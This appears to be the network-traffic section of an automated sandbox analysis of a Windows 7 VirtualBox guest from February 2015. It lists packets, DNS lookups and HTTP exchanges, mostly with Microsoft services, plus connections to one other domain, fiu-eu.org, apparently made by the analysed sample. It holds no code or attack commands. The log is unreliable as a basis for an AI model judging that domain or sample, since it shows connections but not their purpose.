Feb 5, 2015 14:57:02.506175995 CET	60869	5355	192.168.2.151	224.0.0.252
Feb 5, 2015 14:57:02.506180048 CET	60869	5355	192.168.2.151	224.0.0.252
Feb 5, 2015 14:57:02.606559038 CET	60869	5355	192.168.2.151	224.0.0.252
Feb 5, 2015 14:57:02.606563091 CET	60869	5355	192.168.2.151	224.0.0.252
Feb 5, 2015 14:57:05.062690020 CET	49193	80	192.168.2.151	134.170.184.137
Feb 5, 2015 14:57:05.062721014 CET	80	49193	134.170.184.137	192.168.2.151
Feb 5, 2015 14:57:05.344197989 CET	80	49193	134.170.184.137	192.168.2.151
Feb 5, 2015 14:57:05.629642963 CET	49193	80	192.168.2.151	134.170.184.137
Feb 5, 2015 14:57:06.924545050 CET	51002	5355	192.168.2.151	224.0.0.252
Feb 5, 2015 14:57:06.924555063 CET	51002	5355	192.168.2.151	224.0.0.252
Feb 5, 2015 14:57:07.025141954 CET	51002	5355	192.168.2.151	224.0.0.252
Feb 5, 2015 14:57:07.025146008 CET	51002	5355	192.168.2.151	224.0.0.252
Feb 5, 2015 14:57:09.484070063 CET	49194	443	192.168.2.151	65.52.98.231
Feb 5, 2015 14:57:09.484092951 CET	443	49194	65.52.98.231	192.168.2.151
Feb 5, 2015 14:57:09.484308958 CET	49194	443	192.168.2.151	65.52.98.231
Feb 5, 2015 14:57:09.484321117 CET	443	49194	65.52.98.231	192.168.2.151
Feb 5, 2015 14:57:09.484383106 CET	49194	443	192.168.2.151	65.52.98.231
Feb 5, 2015 14:57:09.484390020 CET	443	49194	65.52.98.231	192.168.2.151
Feb 5, 2015 14:57:09.892282009 CET	443	49194	65.52.98.231	192.168.2.151
Feb 5, 2015 14:57:09.902076960 CET	443	49194	65.52.98.231	192.168.2.151
Feb 5, 2015 14:57:09.902156115 CET	49194	443	192.168.2.151	65.52.98.231
Feb 5, 2015 14:57:09.902170897 CET	443	49194	65.52.98.231	192.168.2.151
Feb 5, 2015 14:57:09.909598112 CET	443	49194	65.52.98.231	192.168.2.151
Feb 5, 2015 14:57:09.909610033 CET	443	49194	65.52.98.231	192.168.2.151
Feb 5, 2015 14:57:09.909674883 CET	49194	443	192.168.2.151	65.52.98.231
Feb 5, 2015 14:57:09.909688950 CET	443	49194	65.52.98.231	192.168.2.151
Feb 5, 2015 14:57:09.934995890 CET	443	49194	65.52.98.231	192.168.2.151
Feb 5, 2015 14:57:09.935007095 CET	443	49194	65.52.98.231	192.168.2.151
Feb 5, 2015 14:57:09.935075045 CET	49194	443	192.168.2.151	65.52.98.231
Feb 5, 2015 14:57:09.935090065 CET	443	49194	65.52.98.231	192.168.2.151
Feb 5, 2015 14:57:10.127021074 CET	49194	443	192.168.2.151	65.52.98.231
Feb 5, 2015 14:57:16.084475994 CET	57997	53	192.168.2.151	8.8.8.8
Feb 5, 2015 14:57:16.307493925 CET	49193	80	192.168.2.151	134.170.184.137
Feb 5, 2015 14:57:16.307519913 CET	80	49193	134.170.184.137	192.168.2.151
Feb 5, 2015 14:57:16.576180935 CET	80	49193	134.170.184.137	192.168.2.151
Feb 5, 2015 14:57:16.576783895 CET	49194	443	192.168.2.151	65.52.98.231
Feb 5, 2015 14:57:16.576809883 CET	443	49194	65.52.98.231	192.168.2.151
Feb 5, 2015 14:57:16.578299999 CET	49194	443	192.168.2.151	65.52.98.231
Feb 5, 2015 14:57:16.578319073 CET	443	49194	65.52.98.231	192.168.2.151
Feb 5, 2015 14:57:16.578404903 CET	49194	443	192.168.2.151	65.52.98.231
Feb 5, 2015 14:57:16.578413963 CET	443	49194	65.52.98.231	192.168.2.151
Feb 5, 2015 14:57:16.767573118 CET	49193	80	192.168.2.151	134.170.184.137
Feb 5, 2015 14:57:16.769565105 CET	53	57997	8.8.8.8	192.168.2.151
Feb 5, 2015 14:57:16.789750099 CET	49195	80	192.168.2.151	78.47.223.171
Feb 5, 2015 14:57:16.789778948 CET	80	49195	78.47.223.171	192.168.2.151
Feb 5, 2015 14:57:16.789839029 CET	49195	80	192.168.2.151	78.47.223.171
Feb 5, 2015 14:57:16.790643930 CET	49195	80	192.168.2.151	78.47.223.171
Feb 5, 2015 14:57:16.790662050 CET	80	49195	78.47.223.171	192.168.2.151
Feb 5, 2015 14:57:17.247004986 CET	443	49194	65.52.98.231	192.168.2.151
Feb 5, 2015 14:57:17.264353991 CET	443	49194	65.52.98.231	192.168.2.151
Feb 5, 2015 14:57:17.264369011 CET	443	49194	65.52.98.231	192.168.2.151
Feb 5, 2015 14:57:17.264492989 CET	49194	443	192.168.2.151	65.52.98.231
Feb 5, 2015 14:57:17.264516115 CET	443	49194	65.52.98.231	192.168.2.151
Feb 5, 2015 14:57:17.461056948 CET	49194	443	192.168.2.151	65.52.98.231
Feb 5, 2015 14:57:17.461076021 CET	443	49194	65.52.98.231	192.168.2.151
Feb 5, 2015 14:57:17.662297964 CET	49194	443	192.168.2.151	65.52.98.231
Feb 5, 2015 14:57:18.244987011 CET	49191	80	192.168.2.151	80.239.247.17
Feb 5, 2015 14:57:18.245352983 CET	49192	80	192.168.2.151	23.2.52.54
Feb 5, 2015 14:57:18.245466948 CET	49193	80	192.168.2.151	134.170.184.137
Feb 5, 2015 14:57:18.245573997 CET	49194	443	192.168.2.151	65.52.98.231
Feb 5, 2015 14:57:27.579051971 CET	54096	53	192.168.2.151	8.8.8.8
Feb 5, 2015 14:57:27.773164034 CET	53	54096	8.8.8.8	192.168.2.151
Feb 5, 2015 14:57:27.787072897 CET	61055	53	192.168.2.151	8.8.8.8
Feb 5, 2015 14:57:27.787142992 CET	53	61055	8.8.8.8	192.168.2.151
Feb 5, 2015 14:57:27.788491964 CET	49196	80	192.168.2.151	80.239.149.10
Feb 5, 2015 14:57:27.788517952 CET	80	49196	80.239.149.10	192.168.2.151
Feb 5, 2015 14:57:27.788575888 CET	49196	80	192.168.2.151	80.239.149.10
Feb 5, 2015 14:57:27.789047003 CET	49196	80	192.168.2.151	80.239.149.10
Feb 5, 2015 14:57:27.789066076 CET	80	49196	80.239.149.10	192.168.2.151
Feb 5, 2015 14:57:28.000060081 CET	80	49196	80.239.149.10	192.168.2.151
Feb 5, 2015 14:57:28.202855110 CET	49196	80	192.168.2.151	80.239.149.10
Feb 5, 2015 14:57:28.202878952 CET	80	49196	80.239.149.10	192.168.2.151
Feb 5, 2015 14:57:28.453022957 CET	49196	80	192.168.2.151	80.239.149.10
Feb 5, 2015 14:57:29.894326925 CET	49196	80	192.168.2.151	80.239.149.10
Feb 5, 2015 14:58:02.965929985 CET	61838	53	192.168.2.151	8.8.8.8
Feb 5, 2015 14:58:03.023427010 CET	53	61838	8.8.8.8	192.168.2.151
Feb 5, 2015 14:58:03.026885033 CET	63062	53	192.168.2.151	8.8.8.8
Feb 5, 2015 14:58:03.026947975 CET	53	63062	8.8.8.8	192.168.2.151
Feb 5, 2015 14:58:03.027478933 CET	49197	80	192.168.2.151	23.43.139.27
Feb 5, 2015 14:58:03.027503014 CET	80	49197	23.43.139.27	192.168.2.151
Feb 5, 2015 14:58:03.027565002 CET	49197	80	192.168.2.151	23.43.139.27
Feb 5, 2015 14:58:03.027765036 CET	49197	80	192.168.2.151	23.43.139.27
Feb 5, 2015 14:58:03.027777910 CET	80	49197	23.43.139.27	192.168.2.151
Feb 5, 2015 14:58:03.168879032 CET	80	49197	23.43.139.27	192.168.2.151
Feb 5, 2015 14:58:03.198731899 CET	80	49197	23.43.139.27	192.168.2.151
Feb 5, 2015 14:58:03.198878050 CET	49197	80	192.168.2.151	23.43.139.27
Feb 5, 2015 14:58:03.198900938 CET	80	49197	23.43.139.27	192.168.2.151
Feb 5, 2015 14:58:03.401144981 CET	49197	80	192.168.2.151	23.43.139.27
Feb 5, 2015 14:58:27.169615984 CET	49195	80	192.168.2.151	78.47.223.171
Feb 5, 2015 14:58:27.169750929 CET	80	49195	78.47.223.171	192.168.2.151
Feb 5, 2015 14:58:27.169840097 CET	49195	80	192.168.2.151	78.47.223.171
Feb 5, 2015 14:58:27.219616890 CET	49198	80	192.168.2.151	78.47.223.171
Feb 5, 2015 14:58:27.219652891 CET	80	49198	78.47.223.171	192.168.2.151
Feb 5, 2015 14:58:27.219738960 CET	49198	80	192.168.2.151	78.47.223.171
Feb 5, 2015 14:58:27.220581055 CET	49198	80	192.168.2.151	78.47.223.171
Feb 5, 2015 14:58:27.220603943 CET	80	49198	78.47.223.171	192.168.2.151
Feb 5, 2015 14:59:03.195441961 CET	49197	80	192.168.2.151	23.43.139.27

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 5, 2015 14:55:12.964571953 CET	54262	53	192.168.2.151	8.8.8.8
Feb 5, 2015 14:55:13.102699995 CET	53	54262	8.8.8.8	192.168.2.151
Feb 5, 2015 14:55:13.123143911 CET	64859	53	192.168.2.151	8.8.8.8
Feb 5, 2015 14:55:13.123236895 CET	53	64859	8.8.8.8	192.168.2.151
Feb 5, 2015 14:55:14.190958023 CET	50036	5355	192.168.2.151	224.0.0.252
Feb 5, 2015 14:55:14.190963030 CET	50036	5355	192.168.2.151	224.0.0.252
Feb 5, 2015 14:55:14.288986921 CET	50036	5355	192.168.2.151	224.0.0.252
Feb 5, 2015 14:55:14.288990974 CET	50036	5355	192.168.2.151	224.0.0.252
Feb 5, 2015 14:55:19.940532923 CET	54387	53	192.168.2.151	8.8.8.8
Feb 5, 2015 14:55:20.082818985 CET	53	54387	8.8.8.8	192.168.2.151
Feb 5, 2015 14:55:20.085113049 CET	63011	53	192.168.2.151	8.8.8.8
Feb 5, 2015 14:55:20.085186005 CET	53	63011	8.8.8.8	192.168.2.151
Feb 5, 2015 14:55:36.699021101 CET	63760	53	192.168.2.151	8.8.8.8
Feb 5, 2015 14:55:36.812969923 CET	53	63760	8.8.8.8	192.168.2.151
Feb 5, 2015 14:55:36.975482941 CET	57104	53	192.168.2.151	8.8.8.8
Feb 5, 2015 14:55:36.975572109 CET	53	57104	8.8.8.8	192.168.2.151
Feb 5, 2015 14:55:59.378469944 CET	51014	53	192.168.2.151	8.8.8.8
Feb 5, 2015 14:55:59.551525116 CET	53	51014	8.8.8.8	192.168.2.151
Feb 5, 2015 14:55:59.758740902 CET	61851	53	192.168.2.151	8.8.8.8
Feb 5, 2015 14:55:59.758869886 CET	53	61851	8.8.8.8	192.168.2.151
Feb 5, 2015 14:56:14.066591978 CET	59147	53	192.168.2.151	8.8.8.8
Feb 5, 2015 14:56:14.303567886 CET	53	59147	8.8.8.8	192.168.2.151
Feb 5, 2015 14:56:14.437726974 CET	57914	53	192.168.2.151	8.8.8.8
Feb 5, 2015 14:56:14.437836885 CET	53	57914	8.8.8.8	192.168.2.151
Feb 5, 2015 14:56:20.890158892 CET	64208	5355	192.168.2.151	224.0.0.252
Feb 5, 2015 14:56:20.890162945 CET	64208	5355	192.168.2.151	224.0.0.252
Feb 5, 2015 14:56:21.039073944 CET	64208	5355	192.168.2.151	224.0.0.252
Feb 5, 2015 14:56:21.039077997 CET	64208	5355	192.168.2.151	224.0.0.252
Feb 5, 2015 14:56:23.777149916 CET	61431	53	192.168.2.151	8.8.8.8
Feb 5, 2015 14:56:23.885358095 CET	53	61431	8.8.8.8	192.168.2.151
Feb 5, 2015 14:56:23.893799067 CET	61124	53	192.168.2.151	8.8.8.8
Feb 5, 2015 14:56:23.893893957 CET	53	61124	8.8.8.8	192.168.2.151
Feb 5, 2015 14:56:24.795311928 CET	56831	5355	192.168.2.151	224.0.0.252
Feb 5, 2015 14:56:24.795315981 CET	56831	5355	192.168.2.151	224.0.0.252
Feb 5, 2015 14:56:24.898730993 CET	56831	5355	192.168.2.151	224.0.0.252
Feb 5, 2015 14:56:24.898735046 CET	56831	5355	192.168.2.151	224.0.0.252
Feb 5, 2015 14:56:27.760350943 CET	58211	53	192.168.2.151	8.8.8.8
Feb 5, 2015 14:56:27.909050941 CET	53	58211	8.8.8.8	192.168.2.151
Feb 5, 2015 14:56:28.144205093 CET	64824	53	192.168.2.151	8.8.8.8
Feb 5, 2015 14:56:28.144314051 CET	53	64824	8.8.8.8	192.168.2.151
Feb 5, 2015 14:57:02.506175995 CET	60869	5355	192.168.2.151	224.0.0.252
Feb 5, 2015 14:57:02.506180048 CET	60869	5355	192.168.2.151	224.0.0.252
Feb 5, 2015 14:57:02.606559038 CET	60869	5355	192.168.2.151	224.0.0.252
Feb 5, 2015 14:57:02.606563091 CET	60869	5355	192.168.2.151	224.0.0.252
Feb 5, 2015 14:57:06.924545050 CET	51002	5355	192.168.2.151	224.0.0.252
Feb 5, 2015 14:57:06.924555063 CET	51002	5355	192.168.2.151	224.0.0.252
Feb 5, 2015 14:57:07.025141954 CET	51002	5355	192.168.2.151	224.0.0.252
Feb 5, 2015 14:57:07.025146008 CET	51002	5355	192.168.2.151	224.0.0.252
Feb 5, 2015 14:57:16.084475994 CET	57997	53	192.168.2.151	8.8.8.8
Feb 5, 2015 14:57:16.769565105 CET	53	57997	8.8.8.8	192.168.2.151
Feb 5, 2015 14:57:27.579051971 CET	54096	53	192.168.2.151	8.8.8.8
Feb 5, 2015 14:57:27.773164034 CET	53	54096	8.8.8.8	192.168.2.151
Feb 5, 2015 14:57:27.787072897 CET	61055	53	192.168.2.151	8.8.8.8
Feb 5, 2015 14:57:27.787142992 CET	53	61055	8.8.8.8	192.168.2.151
Feb 5, 2015 14:58:02.965929985 CET	61838	53	192.168.2.151	8.8.8.8
Feb 5, 2015 14:58:03.023427010 CET	53	61838	8.8.8.8	192.168.2.151
Feb 5, 2015 14:58:03.026885033 CET	63062	53	192.168.2.151	8.8.8.8
Feb 5, 2015 14:58:03.026947975 CET	53	63062	8.8.8.8	192.168.2.151

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Feb 5, 2015 14:55:12.964571953 CET	192.168.2.151	8.8.8.8	0xc64d	Standard query (0)	watson.microsoft.com	A (IP address)	IN (0x0001)
Feb 5, 2015 14:55:13.123143911 CET	192.168.2.151	8.8.8.8	0x6d10	Standard query (0)	watson.microsoft.com	A (IP address)	IN (0x0001)
Feb 5, 2015 14:55:19.940532923 CET	192.168.2.151	8.8.8.8	0xd6dc	Standard query (0)	wer.microsoft.com	A (IP address)	IN (0x0001)
Feb 5, 2015 14:55:20.085113049 CET	192.168.2.151	8.8.8.8	0xf309	Standard query (0)	wer.microsoft.com	A (IP address)	IN (0x0001)
Feb 5, 2015 14:55:36.699021101 CET	192.168.2.151	8.8.8.8	0xc60f	Standard query (0)	www.download.windowsupdate.com	A (IP address)	IN (0x0001)
Feb 5, 2015 14:55:36.975482941 CET	192.168.2.151	8.8.8.8	0x9ddf	Standard query (0)	www.download.windowsupdate.com	A (IP address)	IN (0x0001)
Feb 5, 2015 14:55:59.378469944 CET	192.168.2.151	8.8.8.8	0xd267	Standard query (0)	crl.microsoft.com	A (IP address)	IN (0x0001)
Feb 5, 2015 14:55:59.758740902 CET	192.168.2.151	8.8.8.8	0x3a81	Standard query (0)	crl.microsoft.com	A (IP address)	IN (0x0001)
Feb 5, 2015 14:56:14.066591978 CET	192.168.2.151	8.8.8.8	0x38bd	Standard query (0)	www.microsoft.com	A (IP address)	IN (0x0001)
Feb 5, 2015 14:56:14.437726974 CET	192.168.2.151	8.8.8.8	0xef1f	Standard query (0)	www.microsoft.com	A (IP address)	IN (0x0001)
Feb 5, 2015 14:56:23.777149916 CET	192.168.2.151	8.8.8.8	0x3d16	Standard query (0)	go.microsoft.com	A (IP address)	IN (0x0001)
Feb 5, 2015 14:56:23.893799067 CET	192.168.2.151	8.8.8.8	0xb28a	Standard query (0)	go.microsoft.com	A (IP address)	IN (0x0001)
Feb 5, 2015 14:56:27.760350943 CET	192.168.2.151	8.8.8.8	0xb570	Standard query (0)	validation.sls.microsoft.com	A (IP address)	IN (0x0001)
Feb 5, 2015 14:56:28.144205093 CET	192.168.2.151	8.8.8.8	0x8695	Standard query (0)	validation.sls.microsoft.com	A (IP address)	IN (0x0001)
Feb 5, 2015 14:57:16.084475994 CET	192.168.2.151	8.8.8.8	0x860a	Standard query (0)	fiu-eu.org	A (IP address)	IN (0x0001)
Feb 5, 2015 14:57:27.579051971 CET	192.168.2.151	8.8.8.8	0xbc5b	Standard query (0)	crl.microsoft.com	A (IP address)	IN (0x0001)
Feb 5, 2015 14:57:27.787072897 CET	192.168.2.151	8.8.8.8	0xb181	Standard query (0)	crl.microsoft.com	A (IP address)	IN (0x0001)
Feb 5, 2015 14:58:02.965929985 CET	192.168.2.151	8.8.8.8	0x7f9f	Standard query (0)	ocsp.verisign.com	A (IP address)	IN (0x0001)
Feb 5, 2015 14:58:03.026885033 CET	192.168.2.151	8.8.8.8	0x187a	Standard query (0)	ocsp.verisign.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Replay Code	Name	Address	Type	Class
Feb 5, 2015 14:55:13.102699995 CET	8.8.8.8	192.168.2.151	0xc64d	No error (0)	watson.microsoft.com	65.55.252.71	A (IP address)	IN (0x0001)
Feb 5, 2015 14:55:13.123236895 CET	8.8.8.8	192.168.2.151	0x6d10	No error (0)	watson.microsoft.com	65.55.252.71	A (IP address)	IN (0x0001)
Feb 5, 2015 14:55:20.082818985 CET	8.8.8.8	192.168.2.151	0xd6dc	No error (0)	wer.microsoft.com	157.56.141.114	A (IP address)	IN (0x0001)
Feb 5, 2015 14:55:20.085186005 CET	8.8.8.8	192.168.2.151	0xf309	No error (0)	wer.microsoft.com	157.56.141.114	A (IP address)	IN (0x0001)
Feb 5, 2015 14:55:36.812969923 CET	8.8.8.8	192.168.2.151	0xc60f	No error (0)	www.download.windowsupdate.com	93.158.110.250	A (IP address)	IN (0x0001)
Feb 5, 2015 14:55:36.975572109 CET	8.8.8.8	192.168.2.151	0x9ddf	No error (0)	www.download.windowsupdate.com	93.158.110.250	A (IP address)	IN (0x0001)
Feb 5, 2015 14:55:59.551525116 CET	8.8.8.8	192.168.2.151	0xd267	No error (0)	crl.microsoft.com	80.239.247.17	A (IP address)	IN (0x0001)
Feb 5, 2015 14:55:59.758869886 CET	8.8.8.8	192.168.2.151	0x3a81	No error (0)	crl.microsoft.com	80.239.247.17	A (IP address)	IN (0x0001)
Feb 5, 2015 14:56:14.303567886 CET	8.8.8.8	192.168.2.151	0x38bd	No error (0)	www.microsoft.com	23.2.52.54	A (IP address)	IN (0x0001)
Feb 5, 2015 14:56:14.437836885 CET	8.8.8.8	192.168.2.151	0xef1f	No error (0)	www.microsoft.com	23.2.52.54	A (IP address)	IN (0x0001)
Feb 5, 2015 14:56:23.885358095 CET	8.8.8.8	192.168.2.151	0x3d16	No error (0)	go.microsoft.com	134.170.184.137	A (IP address)	IN (0x0001)
Feb 5, 2015 14:56:23.893893957 CET	8.8.8.8	192.168.2.151	0xb28a	No error (0)	go.microsoft.com	134.170.184.137	A (IP address)	IN (0x0001)
Feb 5, 2015 14:56:27.909050941 CET	8.8.8.8	192.168.2.151	0xb570	No error (0)	validation.sls.microsoft.com	65.52.98.231	A (IP address)	IN (0x0001)
Feb 5, 2015 14:56:28.144314051 CET	8.8.8.8	192.168.2.151	0x8695	No error (0)	validation.sls.microsoft.com	65.52.98.231	A (IP address)	IN (0x0001)
Feb 5, 2015 14:57:16.769565105 CET	8.8.8.8	192.168.2.151	0x860a	No error (0)	fiu-eu.org	78.47.223.171	A (IP address)	IN (0x0001)
Feb 5, 2015 14:57:27.773164034 CET	8.8.8.8	192.168.2.151	0xbc5b	No error (0)	crl.microsoft.com	80.239.149.10	A (IP address)	IN (0x0001)
Feb 5, 2015 14:57:27.787142992 CET	8.8.8.8	192.168.2.151	0xb181	No error (0)	crl.microsoft.com	80.239.149.10	A (IP address)	IN (0x0001)
Feb 5, 2015 14:58:03.023427010 CET	8.8.8.8	192.168.2.151	0x7f9f	No error (0)	ocsp.verisign.com	23.43.139.27	A (IP address)	IN (0x0001)
Feb 5, 2015 14:58:03.026947975 CET	8.8.8.8	192.168.2.151	0x187a	No error (0)	ocsp.verisign.com	23.43.139.27	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

watson.microsoft.com

www.download.windowsupdate.com

crl.microsoft.com

www.microsoft.com

go.microsoft.com

fiu-eu.org

ocsp.verisign.com

HTTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Header	Total Bytes Transfered (KB)
Feb 5, 2015 14:55:13.123955011 CET	49188	80	192.168.2.151	65.55.252.71	GET /StageOne/Generic/PnPRequestAdditionalSoftware/x86/USB_VID_80EE_PID_0021_REV_0100/6_1_0_0/0409/input_inf/_.htm?LCID=1033&OS=6.1.7600.2.00010100.0.0.48.16385&SM=innotek%20GmbH&SPN=VirtualBox&BV=VirtualBox&MID=4120A070-FD2D-4714-91B1-58190D826E31&Queue=1 HTTP/1.1 Connection: Keep-Alive User-Agent: MSDW Host: watson.microsoft.com	0
Feb 5, 2015 14:55:13.605523109 CET	80	49188	65.55.252.71	192.168.2.151	HTTP/1.1 200 OK Content-Length: 43 Content-Type: text/html Date: Thu, 05 Feb 2015 13:54:15 GMT Data Raw: 42 75 63 6b 65 74 3d 31 31 33 38 31 35 35 32 34 34 0a 42 75 63 6b 65 74 54 61 62 6c 65 3d 35 0a 52 65 73 70 6f 6e 73 65 3d 31 0a Data Ascii: Bucket=1138155244BucketTable=5Response=1	1
Feb 5, 2015 14:55:36.976176023 CET	49190	80	192.168.2.151	93.158.110.250	GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1 Cache-Control: max-age = 86412 Connection: Keep-Alive Accept: / If-Modified-Since: Tue, 28 Jun 2011 16:26:26 GMT If-None-Match: "0255720b035cc1:0" User-Agent: Microsoft-CryptoAPI/6.1 Host: www.download.windowsupdate.com	9
Feb 5, 2015 14:55:37.119700909 CET	80	49190	93.158.110.250	192.168.2.151	HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Fri, 23 Jan 2015 02:29:11 GMT Accept-Ranges: bytes ETag: "803565fb436d01:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Content-Length: 57591 Cache-Control: max-age=5564 Date: Thu, 05 Feb 2015 13:54:39 GMT Connection: keep-alive X-CCC: GB X-CID: 2 Data Raw: 4d 53 43 46 00 00 00 00 f7 e0 00 00 00 00 00 00 2c 00 00 00 00 00 00 00 03 01 01 00 01 00 00 00 00 00 00 00 49 00 00 00 05 00 01 00 ea 12 02 00 00 00 00 00 00 00 36 46 6d 8f 20 00 61 75 74 68 72 6f 6f 74 2e 73 74 6c 00 d5 04 d6 ab c9 38 00 80 43 4b d4 9c 09 3c 54 dd ff c7 67 b8 76 21 4d f6 64 0d d9 66 10 25 64 df f7 7d 4b d6 90 35 fb 9a 06 d9 95 ec 64 4d 2a 4b 8b 92 4a 96 2c 25 4b 22 84 ca 1e 21 da 90 3d ff 6b d4 13 cf 9d a7 e7 c9 d3 ff f5 7b 3d 2f af 19 f7 9e 7b 67 e6 7e de e7 Data Ascii: MSCF,I6Fm authroot.stl8CK<Tgv!Mdf%d}K5dM*KJ,%K"!=k{=/{g~	9
Feb 5, 2015 14:55:37.120810986 CET	80	49190	93.158.110.250	192.168.2.151	Data Raw: 9c ef f9 de ef f9 9e 8b 0c c1 a1 1c c5 27 da 1f a6 18 36 bf 03 4e 80 93 03 ee 77 ad 17 b6 e1 c0 e1 28 12 24 11 3e 1e 37 19 2e 0e 1d 1e 0c 19 02 9f 93 c0 27 e2 c6 87 03 f0 60 11 62 78 0e b8 cf b7 5e c8 85 24 c5 27 fe 5e 8c 4b 84 43 84 80 b7 1d 98 Data Ascii: '6Nw($>7.'`bx^$'^KC<b=Ju@2eprusXqdijF$4KIQA2m:EP\|(^p=G\|m +6HeX'%$rY()\|;V^rVM_*XI	11
Feb 5, 2015 14:55:37.120831966 CET	80	49190	93.158.110.250	192.168.2.151	Data Raw: c3 9d d9 64 94 c1 e1 93 9a ab bd e1 72 2e 1a 3e af 97 5e 74 ae fb 67 3f 1b 95 e1 50 88 4b 0e 95 1a 7b 3e de 6a 1f d5 e7 f1 26 b4 1d 7e b0 5d 88 3a 02 ed b7 9f 05 2d 0d 7e ca 39 7a 46 3d fe 79 96 dc 9e 52 0d 28 92 33 cb fc e7 fb 28 39 8c e1 72 65 Data Ascii: dr.>^tg?PK{>j&~]:-~9zF=yR(3(9re:8/)bw[_ U+N6U13(8TfqG{oe(<\{:8;IO8Zc}L24n(.==lPwc5+!irocfbM6, >	12
Feb 5, 2015 14:55:37.120949984 CET	80	49190	93.158.110.250	192.168.2.151	Data Raw: 14 ca a1 08 5f 56 72 3f ce 47 fd e1 78 3c 02 85 40 9c 44 2f 0e 8b 73 db e7 70 c3 89 f0 fd 4c 53 fd 90 a1 72 85 d5 93 02 85 fd 8f b8 6e a4 cd cc 9f 47 a5 cb 78 9b 5b cd c5 36 21 03 b6 70 70 06 1c 95 c1 aa 77 c5 dc f2 62 0f 3b 7c 6f 14 3a 98 63 5e Data Ascii: _Vr?Gx<@D/spLSrnGx[6!ppwb;\|o:c^%X};j2t}w@,Pt*hnrHEWL^V1{0{_dlA}11VCT.m}xg:[ ~NQ<O"uyBi2("+eQ![YL	13
Feb 5, 2015 14:55:37.121473074 CET	80	49190	93.158.110.250	192.168.2.151	Data Raw: e8 28 72 0f 4a e5 52 c9 c4 c7 cb 24 ef 28 85 ac e2 f4 85 f9 a9 df 35 92 56 25 6d bf 53 15 14 34 b1 44 ee b0 57 a2 7d 98 f4 e0 b4 75 73 7d 3e 7b fe ab a5 05 f8 54 c2 d1 8a 16 82 27 e5 ef 91 42 5b 58 ec 03 d8 64 41 f5 ba 98 50 9d 14 a8 5b 0a b4 2f Data Ascii: (rJR$(5V%mS4DW}us}>{T'B[XdAP[/-5f@<JX>YV8[{@U3HNs}K]7kdXt(iEU+=6N=2=>sM]/&$>!IB!iE6C&-1Kl}OcHl0dm[}'o	15
Feb 5, 2015 14:55:37.121493101 CET	80	49190	93.158.110.250	192.168.2.151	Data Raw: 4f e7 7b ea a1 ea d7 76 d7 bb ff 70 7c c2 12 c2 6d 0f e8 99 ea 0a bb 4b c9 1a a5 c8 f3 c6 25 9f eb 90 ab 07 3f 87 53 54 59 c1 1b e7 41 ce 73 82 7a 18 b7 e9 8c 08 c3 e5 51 4d 84 78 2b 27 ae 02 7d bf 28 d1 f8 82 37 39 56 b7 e9 a4 fb 92 9b 42 84 f5 Data Ascii: O{vp\|mK%?STYAszQMx+'}(79VBw7gsZh42TYmX'CZ(S'0i1!maZzrH/sSY`O_W9gwoO][DUQkSKzf&W=gwV:?6Iju	16
Feb 5, 2015 14:55:37.121570110 CET	80	49190	93.158.110.250	192.168.2.151	Data Raw: a4 f1 c8 38 aa 2b 2e ff 8e 68 17 ef 4a 79 d3 00 cb e5 35 0a 3f ad 55 89 e8 2c ea 33 a7 39 c3 2f ec 9a af bb e3 2f 41 ff 1c 65 48 f4 af a2 5d ea e0 ed 2a da 57 b3 87 21 d9 b5 45 a8 87 e8 99 af 2c 4a f8 d4 ac 07 2a 18 2e 04 65 b0 47 cd 46 6d 61 1f Data Ascii: 8+.hJy5?U,39//AeH]W!E,J.eGFmaxU'.(#_~.wwy4$DAib)Up>~)KM8\|rmmXx$)[cj($FpU-M:n+R>-%b>TahthN4Y	17
Feb 5, 2015 14:55:37.136929989 CET	80	49190	93.158.110.250	192.168.2.151	Data Raw: 85 4e 3e fd e8 b8 7a a0 43 68 8f 31 8c d6 98 49 a6 f5 e9 25 2b cc a2 86 3f e7 3c 62 cb b1 01 9b 41 de 08 23 d3 ad 37 27 04 ce 30 29 f0 92 f6 27 b1 be dd 47 ea b4 de 0c 68 b6 68 26 06 08 55 bb 2d 5b 23 d5 fb d9 a0 bc 22 d0 dc 14 26 21 76 4d 37 f7 Data Ascii: N>zCh1I%+?<bA#7'0)'Ghh&U-[#"&!vM7s{0`hyG\|x7hvQ?Dm! !q$<0l.2+rJ{Fbx3-XA}*XX[@3d}&'W{{<~uK^FNud#gw=	19
Feb 5, 2015 14:55:37.136950970 CET	80	49190	93.158.110.250	192.168.2.151	Data Raw: 52 6b f8 90 e7 87 10 e2 e0 fc c5 33 51 d6 63 57 7e 8f d6 16 5e 57 e8 85 50 db 79 13 1c 9e d7 72 37 bb d0 61 88 35 76 25 6c 5d 63 6c e7 15 29 56 37 31 73 39 d5 80 0f cb 53 a8 ea 2d 34 9b e3 8e 73 57 b8 36 71 d3 f5 6a a5 bf cb bd 88 28 df 7e 5b bb Data Ascii: Rk3QcW~^WPyr7a5v%l]cl)V71s9S-4sW6qj(~[h!I\|({1k[21#K*fi#j}'\|EvCFAJic>sXfqtiZST<w%TzJRMM;tp\|$/;9~sKLx3f%],7w/\f?m	20
Feb 5, 2015 14:55:37.137001038 CET	80	49190	93.158.110.250	192.168.2.151	Data Raw: a1 a6 53 47 db 7d 6b 5b 4c d5 cb e3 06 aa 4f d2 dc 4d fe 60 4e 0d d9 0c 7d ee 1e da 5e 59 a6 1c 9a 76 94 c2 6a 92 d2 b1 f4 ff 8d 5a bf f2 99 7b 4f de 6c fe 25 36 ba a3 2b be 2c e4 12 0b a6 43 3f 6d 08 10 fe da c5 c4 2b b7 3b cf 4b 0d 5e 55 2d b4 Data Ascii: SG}k[LOM`N}^YvjZ{Ol%6+,C?m+;K^U-z(+9='=[qt1=u9Tn`O}q`W!f8$'B,/)6rE7n=K~\|`)?FF\C_9:rf%"}	22
